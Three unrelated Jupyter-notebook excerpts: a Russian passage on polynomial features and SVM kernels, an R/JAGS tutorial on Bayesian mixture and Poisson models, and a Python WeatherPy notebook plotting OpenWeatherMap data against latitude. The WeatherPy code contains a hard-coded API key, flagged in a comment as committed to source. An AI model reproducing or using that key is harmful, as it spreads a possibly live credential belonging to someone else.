Здесь логистическая регрессия все равно строила гиперплоскость, но в 6-мерном пространстве признаков $1, x_1, x_2, x_1^2, x_1x_2$ и $x_2^2$. В проекции на исходное пространство признаков $x_1, x_2$ граница получилась нелинейной.

На практике полиномиальные признаки действительно помогают, но строить их явно – вычислительно неэффективно. Гораздо быстрее работает SVM с ядровым трюком. При таком подходе в пространстве высокой размерности считается только расстояние между объектами (задаваемое функцией-ядром), а явно плодить комбинаторно большое число признаков не приходится. Про это подробно можно почитать в курсе Евгения Соколова – [тут](https://github.com/esokolov/ml-course-msu/blob/master/ML16/lecture-notes/Sem10_linear.pdf) (математика уже серьезная).
github_jupyter
Histograms of data often reveal that they do not follow any standard probability distribution. Sometimes we have explanatory variables (or covariates) to account for the different values, and normally distributed errors are adequate, as in normal regression. However, if we only have the data values themselves and no covariates, we might have to fit a non-standard distribution to the data. One way to do this is by mixing standard distributions. Mixture distributions are just a weighted combination of probability distributions. For example, we could take an exponential distribution with mean 1 and a normal distribution with mean 3 and variance 1 (although typically the two mixture components would have the same support; here the exponential component has to be non-negative and the normal component can be positive or negative). Suppose we give them weights: 0.4 for the exponential distribution and 0.6 for the normal distribution. We could write the PDF for this distribution as <br> $$p(y) = 0.4 \cdot \exp(-y) \cdot I_{(y \geq 0)} + 0.6 \cdot \frac{1}{\sqrt{2\pi}} \exp\left(-\frac{1}{2}(y-3)^{2}\right)$$ The PDF of this mixture distribution would look like this: ``` options(repr.plot.width = 6, repr.plot.height=5) curve( 0.4*dexp(x, 1.0) + 0.6*dnorm(x, 3.0, 1.0), from=-2.0, to=7.0, ylab="density", xlab="y", main="40/60 mixture of exponential and normal distributions", lwd=2) ``` We could think of these two distributions as governing two distinct populations, one following the exponential distribution and the other following the normal distribution. Let’s draw the weighted PDFs for each population.
``` curve( 0.4*dexp(x, 1.0) + 0.6*dnorm(x, 3.0, 1.0), from=-2.0, to=7.0, ylab="density", xlab="y", main="40/60 mixture of exponential and normal distributions", lwd=2) curve( 0.4*dexp(x, 1.0), from=-2.0, to=7.0, col="red", lty=2, add=TRUE) curve( 0.6*dnorm(x, 3.0, 1.0), from=-2.0, to=7.0, col="blue", lty=2, add=TRUE) ``` The general form for a discrete mixture of distributions is as follows: $$p(y) = \sum_{j=1}^{J}w_{j}.f_{j}(y)$$ where the $\omega$’s are positive weights that add up to 1 (they are probabilities) and each of the J $f_{j}(y)$ functions is a PDF for some distribution. In the example above, the weights were 0.4 and 0.6, $f_{1}$ was an exponential PDF and $f_{2}$ was a normal PDF. One way to simulate from a mixture distribution is with a hierarchical model. We first simulate an indicator for which “population” the next observation will come from using the weights $\omega$. Let’s call this $z_{i}$. In the example above, $z_{i}$ would take the value 1 (indicating the exponential distribution) with probability 0.4 and 2 (indicating the normal distribution) with probability 0.6. Next, simulate the observation yi from the distribution corresponding to $z_{i}$. ``` set.seed(117) n = 1000 z = numeric(n) y = numeric(n) for(i in 1:n) { # returns a 1 with probability 0.4, or a 2 with probability 0.6 z[i] = sample.int(2, 1, prob = c(0.4, 0.6)) if(z[i] == 1) { y[i] = rexp(1, rate = 1.0) } else { y[i] = rnorm(1, mean = 3.0, sd = 1.0) } } hist(y, breaks = 40) ``` # Bayesian Inference for mixture models When we fit a mixture model to data, we usually only have the y values and do not know which “population” they belong to. Because the z variables are unobserved, they are called latent variables. We can treat them as parameters in a hierarchical model and perform Bayesian inference for them. 
The hierarchical model might look like this: $$ y_{i} \, | \, z_{i},\theta \, \sim \, f_{z_{i}}(y \, | \, \theta \,), \,\, i = 1,...,n $$<br> $$Pr(z_{i} = j \, | \, w) = w_{j}, \,\, j = 1,...,J$$<br> $$ w \sim p(w)$$<br> $$ \theta \sim p(\theta)$$ where we might use a Dirichlet prior (see the review of distributions in the supplementary material) for the weight vector ω and conjugate priors for the population-specific parameters in θ. With this model, we could obtain posterior distributions for z (population membership of the observations), ω (population weights), and θ (population-specific parameters in $f_{j}$). Next, we will look at how to fit a mixture of two normal distributions in JAGS. ``` dat = read.csv("mixture.csv", header = FALSE) y = dat$V1 (n = length(y)) hist(y, breaks = 40) plot(density(y)) ``` It appears that we have two populations, but we do not know which population each observation belongs to. We can learn this, along with the mixture weights and population-specific parameters with a Bayesian hierarchical model. We will use a mixture of two normal distributions with variance 1 and different (and unknown) means.
``` library("rjags") library("coda") mod_string = " model { for(i in 1:length(y)){ y[i] ~ dnorm(mu[z[i]], prec) z[i] ~ dcat(omega) } mu[1] ~ dnorm(-1.0, 1.0/1e2) mu[2] ~ dnorm(1.0, 1.0/1e2) T(mu[1],) # ensures mu[1] < mu[2] prec ~ dgamma(1.0/2.0, 1.0*1.0/2.0) sig = sqrt(1.0/prec) omega ~ ddirich(c(1.0, 1.0)) } " set.seed(11) data_jags = list(y=y) params = c("mu", "sig", "omega", "z[1]", "z[31]", "z[49]", "z[6]") # Select some z's to monitor mod = jags.model(textConnection(mod_string), data=data_jags, n.chains=3) update(mod, 1e3) mod_sim = coda.samples(model=mod, variable.names=params, n.iter=5e4) mod_csim = as.mcmc(do.call(rbind, mod_sim)) ## convergence diagnostics options(repr.plot.height=8, repr.plot.width=8) plot(mod_sim, ask=TRUE) autocorr.diag(mod_sim) effectiveSize(mod_sim) ``` # Result ``` summary(mod_sim) par(mfrow=c(3,2)) densplot(mod_csim[,c("mu[1]", "mu[2]", "omega[1]", "omega[2]", "sig")]) ## for the z's options(repr.plot.height = 5, repr.plot.width=8) par(mfrow=c(2,2)) densplot(mod_csim[,c("z[1]", "z[31]", "z[49]", "z[6]")]) table(mod_csim[,"z[1]"]) / nrow(mod_csim) table(mod_csim[,"z[31]"]) / nrow(mod_csim) table(mod_csim[,"z[49]"]) / nrow(mod_csim) table(mod_csim[,"z[6]"]) / nrow(mod_csim) y[c(1, 31, 49, 6)] ``` If we look back to the y values associated with these z variables we monitored, we see that y1 is clearly in Population 1’s territory, y31 is ambiguous, y49 is ambiguous but is closer to Population 2’s territory, and y6 is clearly in Population 2’s territory. The posterior distributions for the z variables closely reflect our assessment. ``` # Ignore this part.
``` # Poisson Example ``` dat = read.csv("callers.csv") head(dat) mod_str = " model { # Likelihood for (i in 1:length(calls)) { calls[i] ~ dpois( days_active[i] * lam[i] ) log(lam[i]) = b[1] + b[2]*age[i] + b[3]*isgroup2[i] } # Priors for(j in 1:3){ b[j] ~ dnorm(0, 1/1e4) } } " mod = jags.model(textConnection(mod_str), data = as.list(dat), n.chains = 3) update(mod, 5e3) params = c("b") mod_sim = coda.samples(mod, variable.names = params, n.iter = 1e4) mod_csim = as.mcmc(do.call(rbind, mod_sim)) colMeans(mod_csim) # Calculate the probability that a person of age 29 who is in group2, calls atleast 3 times a day. lamb = exp(mod_csim[,1] + mod_csim[,2]*29 + mod_csim[,3]*1) * 30 sum(rpois(30000, lamb) >= 3.0)/30000 ```
github_jupyter
# WeatherPy ---- ### Analysis * As expected, the weather becomes significantly warmer as one approaches the equator (0 Deg. Latitude). More interestingly, however, is the fact that the southern hemisphere tends to be warmer this time of year than the northern hemisphere. This may be due to the tilt of the earth. * There is no strong relationship between latitude and cloudiness, however, it is interesting to see that a strong band of cities sits at 0, 80, and 100% cloudiness. * There is no strong relationship between latitude and wind speed, however in northern hemispheres there is a flurry of cities with over 20 mph of wind. ``` # Dependencies and Setup import matplotlib.pyplot as plt import pandas as pd import numpy as np import seaborn as sns import requests import time import urllib # Incorporated citipy to determine city based on latitude and longitude from citipy import citipy # Output File (CSV) output_data_file = "output_data/cities.csv" # Range of latitudes and longitudes lat_range = (-90, 90) lng_range = (-180, 180) ``` ## Generate Cities List ``` # List for holding lat_lngs and cities lat_lngs = [] cities = [] # Create a set of random lat and lng combinations lats = np.random.uniform(low=-90.000, high=90.000, size=1500) lngs = np.random.uniform(low=-180.000, high=180.000, size=1500) lat_lngs = zip(lats, lngs) # Identify nearest city for each lat, lng combination for lat_lng in lat_lngs: city = citipy.nearest_city(lat_lng[0], lat_lng[1]).city_name # If the city is unique, then add it to a our cities list if city not in cities: cities.append(city) # Print the city count to confirm sufficient count len(cities) ``` ## Perform API Calls ``` # OpenWeatherMap API Key # SECURITY: hard-coded API key committed to source — rotate this key and load it from an environment variable or untracked config file instead api_key = "924783bda048569443e49dd6a03e5591" # Starting URL for Weather Map API Call url = "http://api.openweathermap.org/data/2.5/weather?units=Imperial&APPID=" + api_key # List of city data city_data = [] # Print to logger print("Beginning Data Retrieval ") print("-----------------------------") # 
Create counters record_count = 1 set_count = 1 # Loop through all the cities in our list for i, city in enumerate(cities): # Group cities in sets of 50 for logging purposes if (i % 50 == 0 and i >= 50): set_count += 1 record_count = 0 # Create endpoint URL with each city city_url = url + "&q=" + urllib.request.pathname2url(city) # Log the url, record, and set numbers print("Processing Record %s of Set %s | %s" % (record_count, set_count, city)) print(city_url) # Add 1 to the record count record_count += 1 # Run an API request for each of the cities try: # Parse the JSON and retrieve data city_weather = requests.get(city_url).json() # Parse out the max temp, humidity, and cloudiness city_lat = city_weather["coord"]["lat"] city_lng = city_weather["coord"]["lon"] city_max_temp = city_weather["main"]["temp_max"] city_humidity = city_weather["main"]["humidity"] city_clouds = city_weather["clouds"]["all"] city_wind = city_weather["wind"]["speed"] city_country = city_weather["sys"]["country"] city_date = city_weather["dt"] # Append the City information into city_data list city_data.append({"City": city, "Lat": city_lat, "Lng": city_lng, "Max Temp": city_max_temp, "Humidity": city_humidity, "Cloudiness": city_clouds, "Wind Speed": city_wind, "Country": city_country, "Date": city_date}) # If an error is experienced, skip the city except: print("City not found. 
Skipping...") pass # Indicate that Data Loading is complete print("-----------------------------") print("Data Retrieval Complete ") print("-----------------------------") # Convert array of JSONs into Pandas DataFrame city_data_pd = pd.DataFrame(city_data) # Extract relevant fields from the data frame lats = city_data_pd["Lat"] max_temps = city_data_pd["Max Temp"] humidity = city_data_pd["Humidity"] cloudiness = city_data_pd["Cloudiness"] wind_speed = city_data_pd["Wind Speed"] # Export the City_Data into a csv city_data_pd.to_csv(output_data_file, index_label="City_ID") # Show Record Count city_data_pd.count() # Display the City Data Frame city_data_pd.head() ``` ## Latitude vs Temperature Plot ``` # Build scatter plot for latitude vs temperature plt.scatter(lats, max_temps, edgecolor="black", linewidths=1, marker="o", alpha=0.8, label="Cities") # Incorporate the other graph properties plt.title("City Latitude vs. Max Temperature (%s)" % time.strftime("%x")) plt.ylabel("Max Temperature (F)") plt.xlabel("Latitude") plt.grid(True) # Save the figure plt.savefig("output_data/Fig1.png") # Show plot plt.show() ``` ## Latitude vs. Humidity Plot ``` # Build the scatter plots for each city types plt.scatter(lats, humidity, edgecolor="black", linewidths=1, marker="o", alpha=0.8, label="Cities") # Incorporate the other graph properties plt.title("City Latitude vs. Humidity (%s)" % time.strftime("%x")) plt.ylabel("Humidity (%)") plt.xlabel("Latitude") plt.grid(True) # Save the figure plt.savefig("output_data/Fig2.png") # Show plot plt.show() ``` ## Latitude vs. Cloudiness Plot ``` # Build the scatter plots for each city types plt.scatter(lats, cloudiness, edgecolor="black", linewidths=1, marker="o", alpha=0.8, label="Cities") # Incorporate the other graph properties plt.title("City Latitude vs. 
Cloudiness (%s)" % time.strftime("%x")) plt.ylabel("Cloudiness (%)") plt.xlabel("Latitude") plt.grid(True) # Save the figure plt.savefig("output_data/Fig3.png") # Show plot plt.show() ``` ## Latitude vs. Wind Speed Plot ``` # Build the scatter plots for each city types plt.scatter(lats, wind_speed, edgecolor="black", linewidths=1, marker="o", alpha=0.8, label="Cities") # Incorporate the other graph properties plt.title("City Latitude vs. Wind Speed (%s)" % time.strftime("%x")) plt.ylabel("Wind Speed (mph)") plt.xlabel("Latitude") plt.grid(True) # Save the figure plt.savefig("output_data/Fig4.png") # Show plot plt.show() ```
github_jupyter